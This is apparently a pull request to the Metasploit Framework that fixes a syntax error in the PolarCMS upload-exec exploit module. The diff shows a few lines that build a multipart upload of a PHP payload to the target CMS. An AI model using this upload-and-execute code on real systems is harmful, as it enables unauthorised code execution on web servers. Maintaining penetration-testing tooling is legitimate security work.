### PR TITLE
Fix polar cms upload exec exploit

### DIFF
--- a/modules/exploits/multi/http/polarcms_upload_exec.rb
+++ b/modules/exploits/multi/http/polarcms_upload_exec.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		data = Rex::MIME::Message.new
 		data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
-		data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"")
+		data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\""))
 		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 		print_status("#{peer} - Uploading payload #{@payload_name}")
 		res = send_request_cgi({


### PR DESCRIPTION
Line 83 had an extra , and was missing a ) at the end. This caused msfconsole to not be able to setup the database.
